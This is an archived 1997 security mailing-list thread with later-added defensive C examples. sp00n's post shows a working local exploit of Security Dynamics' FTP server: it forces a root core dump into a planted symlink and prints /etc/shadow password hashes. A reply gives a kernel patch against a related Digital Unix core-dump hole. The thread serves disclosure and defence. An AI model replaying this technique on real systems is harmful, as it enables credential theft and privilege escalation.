[481] in Best-of-Security
BoS: Bug In Security Dynamics' FTP server (Version 2.2)
daemon@ATHENA.MIT.EDU (sp00n)
Mon Nov 17 20:57:02 1997
X-Delivering-To: best-of-security-mtg@menelaus.mit.edu
Date: Wed, 12 Nov 1997 11:56:29 -0500
Reply-To: sp00n <sp00n@COUPLER.300BAUD.COM>
From: sp00n <sp00n@COUPLER.300BAUD.COM>
Old-X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
Old-X-Originated-From: From: sp00n <sp00n@COUPLER.300BAUD.COM>
Errors-To: best-of-security-request@cyber.com.au
To: best-of-security@cyber.com.au
Resent-From: best-of-security@cyber.com.au
Hi,
This bug is similar to the Solaris and other ftp core dump bugs, slightly
different though. BTW, the machine is a SPARC 20 running 2.5. You can link
files and clobber them with a core to annoy your local sysadmin or, even
better, get /etc/shadow; you get the point... anyways
220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core
At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it
:(
Not too useful, you say? Welp, prior to dumping the core you should link it
to ps_data or something like that; then you will get this:
lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$ file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$ strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root
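The post shows the classic precondition for this class of bug: a root process writes a file (here the core) into a shared directory where an unprivileged user has pre-planted a symlink with that name. The following is an added example, not code from the post, showing how a privileged writer should create a file in such a directory so that a planted link is refused rather than followed: lstat() to spot an existing symlink, then open() with O_CREAT|O_EXCL|O_NOFOLLOW and an owner-only mode. The demo function plants a `core -> ps_data` link in a fresh mkdtemp() directory (constructed test data, not the post's host) and verifies the two outcomes. It assumes a POSIX system that defines O_NOFOLLOW (Linux, the BSDs, Solaris 10 and later).

```c
/* Added example (not from the original post): safe file creation by a
 * privileged process in a world-writable directory such as /tmp.
 * Assumes POSIX with O_NOFOLLOW; test paths below are constructed. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create `path` for writing, refusing to follow or reuse anything already
 * there. O_EXCL makes open() fail if any entry (even a dangling symlink)
 * exists; O_NOFOLLOW also rejects a symlink that races in between the
 * lstat() and the open(). Returns an fd, or -1 with errno set. */
int safe_create(const char *path)
{
    struct stat st;

    /* Cheap early check: an existing symlink is exactly the planted case. */
    if (lstat(path, &st) == 0 && S_ISLNK(st.st_mode)) {
        errno = EEXIST;
        return -1;
    }
    /* Mode 0600: even when created by root, group/other cannot read it. */
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Self-contained demonstration: plants "core -> ps_data" in a temporary
 * directory (constructed), checks that safe_create() refuses it with
 * EEXIST, then checks that an unplanted name is created owner-only.
 * Returns 1 on the expected outcome, 0 otherwise. */
int demo_symlink_clobber_check(void)
{
    char dir[] = "/tmp/coredemoXXXXXX";   /* mkdtemp() template */
    char link_path[PATH_MAX], fresh_path[PATH_MAX];
    struct stat st;
    int fd, ok = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(link_path, sizeof link_path, "%s/core", dir);
    snprintf(fresh_path, sizeof fresh_path, "%s/core.ok", dir);

    /* The precondition from the post: an unprivileged user's symlink. */
    if (symlink("ps_data", link_path) != 0)
        goto cleanup;

    /* The privileged writer must fail here instead of clobbering ps_data. */
    fd = safe_create(link_path);
    if (fd != -1 || errno != EEXIST) {
        if (fd != -1)
            close(fd);
        goto cleanup;
    }

    /* A name nobody pre-planted is created with no group/other bits. */
    fd = safe_create(fresh_path);
    if (fd == -1)
        goto cleanup;
    if (fstat(fd, &st) == 0 && (st.st_mode & 077) == 0)
        ok = 1;
    close(fd);

cleanup:
    unlink(fresh_path);
    unlink(link_path);
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("planted symlink refused, safe file created: %s\n",
           demo_symlink_clobber_check() ? "yes" : "NO");
    return 0;
}
```

The same pattern applies to any privileged daemon that writes logs, lock files or temporary data into a directory it does not own; the kernel's own core writer is the one piece a userland program cannot fix this way, which is why the core-dump limit itself is the lever for that case.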
From avalon@coombs.anu.edu.au Sun Nov 16 22:19:03 1997
Received: from satay.cyber.com.au (satay.cyber.com.au [203.7.155.20]) by plum.cyber.com.au (8.6.12/8.6.6) with ESMTP id WAA02524 for <slist@cyber.com.au>; Sun, 16 Nov 1997 22:19:03 +1100
Received: (from uucp@localhost) by satay.cyber.com.au (8.7.4/8.7.3) id WAA26307 for <slist@cyber.com.au>; Sun, 16 Nov 1997 22:18:18 +1100 (EST)
Message-Id: <199711161118.WAA26307@satay.cyber.com.au>
Received: from cheops.anu.edu.au(150.203.76.24) by satay.cyber.com.au via smap (V1.3) id sma026282; Sun Nov 16 22:17:49 1997
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA285879110; Sun, 16 Nov 1997 22:18:30 +1100
Date: Sun, 16 Nov 1997 22:18:30 +1100
From: Darren Reed <avalon@coombs.anu.edu.au>
Apparently-To: slist@cyber.com.au
Status: O
Approved: darrenr@cyber.com.au
X-Originally-To: To: BUGTRAQ@NETSPACE.ORG
X-Originated-From: From: sp00n <sp00n@COUPLER.300BAUD.COM>
From owner-bugtraq@NETSPACE.ORG Sun Nov 16 08:17:12 EDT 1997 remote from cheops
Received: from brimstone.netspace.org by postbox.anu.edu.au with ESMTP (1.37.109.16/16.2) id AA007538627; Sun, 16 Nov 1997 08:17:07 +1100
Received: from unknown@netspace.org (port 23568 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <96049-27738>; Sat, 15 Nov 1997 15:08:13 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 5661334 for BUGTRAQ@NETSPACE.ORG; Sat, 15 Nov 1997 15:07:06 -0500
Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by netspace.org (8.8.7/8.8.2) with ESMTP id OAA28841 for <BUGTRAQ@NETSPACE.ORG>; Sat, 15 Nov 1997 14:56:07 -0500
Received: from unknown@netspace.org (port 23568 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <80685-27736>; Sat, 15 Nov 1997 14:56:07 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from blubb.pdc.kth.se (blubb.pdc.kth.se [193.10.159.47]) by netspace.org (8.8.7/8.8.2) with SMTP id VAA07409 for <BUGTRAQ@netspace.org>; Fri, 14 Nov 1997 21:11:47 -0500
Received: from joda by blubb.pdc.kth.se with local (Exim 1.71 #1) id 0xWXhz-0001Rh-00; Sat, 15 Nov 1997 03:11:39 +0100
References: <Pine.OSF.3.91.971114122615.31640B-100000@osprey.unf.edu>
X-Emacs: 19.34
Mime-Version: 1.0 (generated by SEMI MIME-Edit 0.77)
Content-Type: text/plain; charset=US-ASCII
Lines: 35
X-Mailer: Gnus v5.4.52/Emacs 19.34
Message-Id: <xofzpn6x5wo.fsf@blubb.pdc.kth.se>
Date: Sat, 15 Nov 1997 03:11:35 +0100
Reply-To: Johan Danielsson <joda@PDC.KTH.SE>
Sender: avalon
From: Johan Danielsson <joda@PDC.KTH.SE>
Subject: Re: digital unix 4.0 hole
X-To: John McDonald <jmcdonal@OSPREY.UNF.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: John McDonald's message of Fri, 14 Nov 1997 12:37:20 -0500
John McDonald <jmcdonal@OSPREY.UNF.EDU> writes:
> If you run dbx (tested on 3.11.10) on a setuid root program that you
> have read access to, the program will core dump and create a root
> owned 600 perm core in the current directory.
The problem isn't procfs per se, but rather that it causes the program
to dump core.
What happens is that in core(), vn_open() is called just before it's
supposed to `temporarily restore real user/group ids for file
operations'. For anyone with source, the fun happens around line 4350
in kernel/bsd/kern_sig.c.
If you're *real* paranoid about this, you might be able to:
# cp /vmunix /vmunix.save
# dbx /vmunix
dbx version 3.11.10
Type 'help' for help.
main: Source not available
warning: Files compiled -g3: parameter values probably wrong
(dbx) ((unsigned*)core+82)/1 i
[core:5261, 0xfffffc000026ff48] and r1, r2, r1
(dbx) patch *((unsigned*)core+82) = 0x203f0001
[core:5261, 0xfffffc000026ff48] lda r1, 1(r31)
(dbx) q
# reboot
This might work with 4.0[ABC]; I haven't tried it though. :-) It
should completely disable all core dumps.
/Johan
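Johan's dbx patch turns off core dumps for the whole machine by editing the running kernel. A daemon that handles untrusted input (an ftpd, for instance) can achieve the same protection for itself without touching the kernel, by dropping RLIMIT_CORE to zero before it starts talking to clients. The following is an added example, not code from either post: it sets both the soft and the hard limit to 0 so that neither the process nor anything it execs can raise it again, and on Linux additionally marks the process non-dumpable with prctl(). It assumes a POSIX system with setrlimit(); the prctl() part is guarded and Linux-only.

```c
/* Added example (not from the original posts): a privileged daemon opting
 * out of core dumps before it processes untrusted input. Assumes POSIX
 * setrlimit(); the prctl() call is Linux-specific and guarded. */
#include <stdio.h>
#include <sys/resource.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Set RLIMIT_CORE to 0/0. Lowering the hard limit needs no privilege, and
 * once it is 0 no later setrlimit() in this process or its children can
 * raise it. Returns 0 on success, -1 on failure. */
int disable_core_dumps(void)
{
    struct rlimit rl;

    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
#ifdef __linux__
    /* Belt and braces on Linux: a non-dumpable process writes no core even
     * if a limit were somehow raised, and cannot be ptraced by other
     * unprivileged processes of the same uid. */
    if (prctl(PR_SET_DUMPABLE, 0) != 0)
        return -1;
#endif
    return 0;
}

/* Read the limit back; returns 1 when both soft and hard limit are 0.
 * A daemon can call this after dropping privileges as a sanity check. */
int core_dumps_disabled(void)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return 0;
    return rl.rlim_cur == 0 && rl.rlim_max == 0;
}

int main(void)
{
    struct rlimit before;

    getrlimit(RLIMIT_CORE, &before);
    printf("RLIMIT_CORE before: soft=%ld hard=%ld\n",
           (long)before.rlim_cur, (long)before.rlim_max);

    if (disable_core_dumps() != 0) {
        perror("disable_core_dumps");
        return 1;
    }
    printf("core dumps disabled: %s\n", core_dumps_disabled() ? "yes" : "NO");
    /* From here on, a crash while handling a client leaves no core file in
     * whatever directory the daemon happened to chdir() into. */
    return 0;
}
```

Call disable_core_dumps() as early as possible in the daemon's startup, before any chdir() into a client-controlled directory and before privileges are changed; the check function is cheap enough to run again right before the main service loop.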